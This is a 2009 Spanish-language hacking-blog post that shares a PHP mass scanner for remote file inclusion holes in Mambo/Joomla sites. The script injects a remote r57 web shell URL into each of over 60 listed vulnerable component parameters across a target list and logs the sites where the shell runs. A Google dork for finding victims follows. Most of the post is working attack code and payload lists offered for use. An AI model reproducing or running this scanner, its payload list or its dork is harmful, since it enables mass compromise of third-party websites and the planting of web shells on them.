_ThePase_

Blogs de Seguridad Informática

Principal

Sobre este blog:



Este es un blog temático dedicado a la Seguridad Informática. Aunque hace las veces de blog personal, la principal función del mismo es exponer contenidos técnicos relacionados con la seguridad.

Blogroll: 13

[x] Agregar a thepase

attackers attackers
ricota ricota
punisher punisher
r0dr1 r0dr1
84kur10 84kur10
darkspark darkspark
pandemic pandemic
murder murder
kfoo kfoo
zer0-z0org zer0-z0org
ragnarok ragnarok

... Ver todos

Perfil de thepase

[x]Nick: thepase
Rango: Newbie
País: do
Visitas: 78534
Votos: 45
En Blogrolls: 26
Status: PM

Patrocinadores:


Anuncia aquí

[x][PHP] Mass Mambo/joomla RFI Scanner

Publicado el 31/10/2009 12:10:00 en Hacking Web. Total de votos: 0  Votar



<?php

/*
PHP Mass Mambo/Joomla RFI Scanner version 1.5 - 26/04/2007
Written by R00T[ATI] && Minus. hvc88[at]hotmail.com
*/

if ($argc<5) {
echo"\nUsage: php mass_scan.php targets.txt output.txt list.txt http://r57_shell.txt\n"; 
die;
}


$targetsi = $argv[1];
$outputi = $argv[2];
$lista = $argv[3];
$shell = $argv[4];
$shell .= "?";

if(!$targets=fopen($targetsi,"r"))
{
echo "Error reading input sites file\n";
exit;
}


if(!$list=fopen($lista,"r"))
{
echo "Error reading rfi file\n";
exit;
}

/* For not replace eventual output files Minus plugged-in this code */
if (file_exists($outputi)) {
$outputi = "$outputi.2"; 
}

if (file_exists("$outputi".".1")) {
$outputi = "$outputi.2"; 
}
/* End of Minus add-on */

if(!$output=fopen($outputi,"w"))
{
echo "Error writing in output file\n";
exit;
}


ini_set('max_execution_time', 999999999);


while(!feof($targets)) /* First cicle of targets list */
{
$target_h = (fgets($targets));
fclose($list);  /* Closing RFI file */
$list=fopen($lista,"r"); /* Reopening RFI and LFI file for restart the pointer at the first line */

    do { /* Opening second cicle for RFI and LFI file */

    $list_h = (fgets($list));
    $site =  trim($target_h).trim($list_h).$shell; /* trim for delete the spaces */
    echo $site; 

    $file = @fopen($site, 'r'); /* Rudimental HTTP replay grabber XD */
        if ($file)
        {
        echo " - 200\n";
      $lines = file($site);
      foreach($lines as $line_num => $line) {
      $content = $line;
      if (preg_match("/r57/",$content)){
      echo "\nFound RFI\n\n";
      fputs($output ,"$site"."\n"); /* Write in output file */
      }
      }
        }
            else /* If site replay with 404 */
            {
            echo " - 404\n"; /* 404??? Maybe also 403 or 500 */
            }
      } while(!feof($list)); /* Closing RFI and LFI file */
    
    $not_regular_200 = false; /* Resetting boolean flag to false */

} /* Closing first cicle of targets list */
fclose($list);
fclose($targets);
fclose($output);
?>


TARGETS.TXT
ej. http://www.wall.com

LIST.TXT
/index.php?option=com_custompages&cpage=
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=
/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=
/components/com_facileforms/facileforms.frame.php?ff_compath=
/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=
/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=
/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=
/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=
/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=
/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=
/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=
/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=
/mod_cbsms_messages.php?mosConfig_absolute_path=
/includes/adminBanned.php?GlobalSettings[templatesDirectory]=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/components/com_simpleboard/image_upload.php?sbp=
/components/com_forum/download.php?phpbb_root_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_mospray/scripts/admin.php?basedir=
/components/com_moodle/moodle.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site
/com_securityimages/configinsert.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
/components/com_mambowiki/MamboLogin.php?IP=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path =
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/modules/mod_flatmenu.php?mosConfig_absolute_path=
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
/components/com_minibb/bb_plugins.php?absolute_path=
/modules/mod_weather.php?absolute_path=
/components/com_calendar.php?absolute_path=
/classes/html/com_articles.php?absolute_path=
/includes/Cache/Lite/Output.php?mosConfig_absolute_path=


DORK:Google
"powered by mambo" | inurl:"index2.php" | inurl:"administrator/index.php"

Comentarios:

[x][x][x] zer0max dijo: buena men oes esta bueno eso del scanner jeje


[x][x][x] MurdeR dijo: Este post es el culpable xD! Gracias a estos dorks, se pasan a diario muchos scanners gugleros :P

Igual no joden, pero ya tenia curiosidad de pq tantos!


Para dejar un comentario Registrase o Iniciar sesión



Powered by Diosdelared.com CMS Blogs
© Diosdelared 2009